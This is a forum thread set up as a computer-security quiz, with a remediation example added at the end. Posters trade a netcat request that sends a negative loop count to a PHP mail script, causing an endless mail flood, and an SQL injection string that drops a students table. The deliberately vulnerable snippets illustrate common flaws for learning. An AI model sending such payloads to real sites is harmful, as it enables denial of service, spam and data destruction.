Security Quiz

Oceanic

Ok, this game is easy.
I start by writing a question about computer security; if someone can answer it with a correct motivation, they write a new one. The first to make 10 correct answers wins.

Here is my first question:
You want to lag an email site down (you want to send as many e-mails as possible).
You know that the site uses this script:
PHP:
<?
if(isset($_GET["numbers_of_mail) && !empty($_GET["numbers_of_mail)){
	for($loop = 0; $loop != $_GET["numbers_of_mail"]; $loop++){
	mail('[email protected]', 'Spam Message', "Hello");
	}
}
?>

What can you do to crash the site?
 
Your script is broken =) (missing quotes)
;;
Code:
echo "GET /scriptplzz.php?numbers_of_mail=-1\n\rHost: noobsite.com\n\r\n\r" | nc noobsite.com 80
Hooray infinite loop!

;-;

Here's a classic one:
Code:
$query = "SELECT `password` FROM `students` WHERE `username` = '{$_GET['logon']}'";
$result = mysql_query($query, $link);

Russian Mafia will give you jonnyland if you nuke ``students'' table ;-)
 
Ooops, was tired when I wrote it :huh:
It is correct, all >0 make an infinite loop :thumbup:
 
Not sure if this is enough for you (I'm no expert :p)

Korn'; DROP TABLE `students`;
 
HOORAH A POINT (sorry, no jonnyland)! If I had more than one where clause you would use ;-- after evul command, so it would ignore the other where clauses ;)

> Ooops, was tired when I wrote it :huh:
> It is correct, all >0 make an infinite loop :thumbup:

No, everything <0 ;)!
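
The two flaws discussed in this thread, a request-controlled loop bound compared with `!=` and a query built by string interpolation, shown in a hardened form. This is an added example, not code from any poster; `MAX_MAILS`, `parse_mail_count`, `find_password` and the in-memory SQLite table are assumptions made for illustration.

```php
<?php
// Added example, not code from the thread. MAX_MAILS and both function names are hypothetical.
const MAX_MAILS = 50;

// Parse the loop bound from the query string: only integers in 1..MAX_MAILS pass.
// Negative numbers, non-numeric strings and missing values are all rejected as null.
function parse_mail_count(array $get): ?int
{
    $n = filter_var($get['numbers_of_mail'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => MAX_MAILS]]);
    return $n === false ? null : $n;
}

// Look up a row with a bound parameter: the username travels as data, never as SQL text.
function find_password(PDO $db, string $logon): ?string
{
    $stmt = $db->prepare('SELECT password FROM students WHERE username = ?');
    $stmt->execute([$logon]);
    $value = $stmt->fetchColumn();
    return $value === false ? null : $value;
}

// Constructed sample data in an in-memory SQLite database (needs the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE students (username TEXT PRIMARY KEY, password TEXT)');
$db->exec("INSERT INTO students VALUES ('Korn', 'constructed-value')");

// The loop compares with < instead of !=, so even an unvalidated negative
// bound would end immediately; the validated bound is additionally capped.
$count = parse_mail_count(['numbers_of_mail' => '-1']) ?? 0;
$sent = 0;
for ($loop = 0; $loop < $count; $loop++) {
    $sent++; // the mail() call from the quiz script would go here
}

// Show how each constructed input from the thread is handled.
var_dump($sent);
var_dump(parse_mail_count(['numbers_of_mail' => '-1']));
var_dump(parse_mail_count(['numbers_of_mail' => '3']));
var_dump(find_password($db, 'Korn'));
var_dump(find_password($db, "Korn'; DROP TABLE `students`;"));
var_dump($db->query('SELECT COUNT(*) FROM students')->fetchColumn());
```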
 